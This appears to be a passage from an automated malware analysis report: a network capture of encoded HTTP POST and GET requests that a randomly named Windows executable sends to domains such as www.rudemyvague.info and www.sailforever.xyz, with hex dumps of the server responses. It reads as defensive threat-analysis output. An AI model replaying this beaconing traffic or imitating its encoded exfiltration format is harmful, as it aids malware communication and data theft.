2 | 192.168.2.5 | 53080 | 52.13.151.179 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:56:49.206492901 CEST | 776 | OUT | POST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 77 67 62 47 49 4b 6d 4e 69 2f 37 44 67 2f 4f 6a 2f 56 38 43 39 49 64 50 56 51 31 51 37 49 35 70 6d 79 6d 5a 49 6e 63 72 4e 4f 51 4d 48 71 63 50 53 69 74 2b 44 32 67 64 2b 73 39 48 51 38 4e 72 36 31 39 72 70 2f 2b 51 6a 74 55 6e 46 56 68 38 75 75 64 66 33 42 2f 6c 34 30 31 30 52 4e 71 30 38 67 48 77 50 49 6c 69 52 53 78 30 34 42 79 79 73 6e 34 43 41 64 35 55 56 62 38 61 61 4f 46 4f 6f 47 6c 51 69 42 7a 4a 75 41 63 5a 48 30 37 37 74 73 53 59 32 46 4d 58 69 34 58 67 47 6c 30 59 76 33 7a 52 68 61 6d 35 67 48 43 34 75 6e 79 6d 68 46 79
                                                                                                                                  Data Ascii: DrelH=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH077tsSY2FMXi4XgGl0Yv3zRham5gHC4unymhFy
Oct 22, 2024 22:56:49.901544094 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:49 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS%QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
Oct 22, 2024 22:56:49.901715994 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}mo\HSe0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 53092 | 52.13.151.179 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:56:51.749663115 CEST | 1793 | OUT | POST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 32 34 62 61 71 43 6d 4f 41 58 37 41 67 2f 4f 34 2f 56 35 43 39 49 41 50 55 30 78 51 37 45 44 70 6a 32 6d 62 71 76 63 71 38 4f 51 5a 58 71 63 51 69 69 6f 6a 54 32 31 64 2b 64 30 48 51 73 4e 72 36 31 39 72 73 7a 2b 41 47 42 55 33 31 56 69 2f 75 75 72 62 33 42 44 6c 38 59 44 30 52 35 36 30 73 41 48 7a 75 34 6c 6c 69 36 78 38 34 42 77 31 73 6e 67 43 41 5a 6d 55 56 58 47 61 62 37 59 4f 76 71 6c 54 31 41 71 4d 66 4d 6b 4d 45 49 70 78 2f 6c 32 5a 32 56 30 5a 6b 38 45 6f 46 78 4f 62 4e 7a 4f 63 6b 4f 62 36 52 65 34 68 5a 6a 42 32 46 6f 41 6a 2b 6c 6b 59 76 76 6f 42 66 74 6b 61 4e 74 76 41 47 37 71 4d 43 57 6c 6f 77 6e 67 7a 57 67 33 69 58 51 51 51 42 79 72 32 63 52 6e 73 51 6a 51 30 55 41 30 61 38 57 74 52 32 46 34 74 7a 6d 4d 62 44 62 4f 4a 66 54 57 34 6f 50 38 6f 77 4d 79 44 6e 6a 2b 54 46 72 57 4f 54 71 78 55 55 4b 35 38 79 2f 51 48 65 6a 6e 50 64 34 52 42 67 36 41 [TRUNCATED]
Data Ascii: DrelH= [TRUNCATED]
Oct 22, 2024 22:56:53.020669937 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:52 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
Oct 22, 2024 22:56:53.020713091 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0
Oct 22, 2024 22:56:53.020777941 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0
Oct 22, 2024 22:56:53.021024942 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:52 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 53101 | 52.13.151.179 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:56:54.296303988 CEST | 485 | OUT | GET /t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:56:54.995570898 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:54 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                                                                  Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
Oct 22, 2024 22:56:54.995696068 CEST | 1210 | IN | Data Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                                                                  Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 53160 | 103.106.67.112 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:08.469630003 CEST | 753 | OUT | POST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 63 38 6d 6c 4a 76 4b 6f 78 73 45 77 74 6f 4e 4e 30 4e 55 33 42 31 30 59 72 36 52 47 43 4b 70 72 78 42 74 45 35 55 3d
                                                                                                                                  Data Ascii: DrelH=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCic8mlJvKoxsEwtoNN0NU3B10Yr6RGCKprxBtE5U=
Oct 22, 2024 22:57:09.202450037 CEST | 245 | IN | HTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:09 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 53171 | 103.106.67.112 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:11.025197983 CEST | 773 | OUT | POST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 70 6a 68 63 56 2b 71 38 36 59 43 46 72 74 43 39 68 5a 2b 57 46 43 5a 74 48 66 36 34 45 6f 56 42 5a 2b 32 42 44 72 6c 64 35 6a 4a 46 49 71 2b 4b 68 56 52 2b 58 47 76 31 4b 47 58 47 72 72 5a 65 78 6b 4e 4e 74 52 78 30 33 77 7a 7a 6b 46 45 78 4d 4d 52 49 53 43 45 50 7a 7a 46 39 4d 54 4b 50 30 48 76 65 49 58 37 53 4d 59 36 41 7a 66 4b 46 61 67 68 6e 45 30 74 75 31 76 6b 4a 79 39 39 58 34 42 78 62 46 6e 58 57 46 38 6b 68 5a 4d 49 34 79 6d 58 79 72 41 78 53 52 64 61 75 41 6d 4d 71 6d 46 44 67 5a 30 46 38 39 36 30 43 69 41 42 4c 52 53
                                                                                                                                  Data Ascii: DrelH=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khZMI4ymXyrAxSRdauAmMqmFDgZ0F8960CiABLRS
Oct 22, 2024 22:57:11.758527994 CEST | 245 | IN | HTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:11 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 53184 | 103.106.67.112 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:13.579629898 CEST | 1790 | OUT | POST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
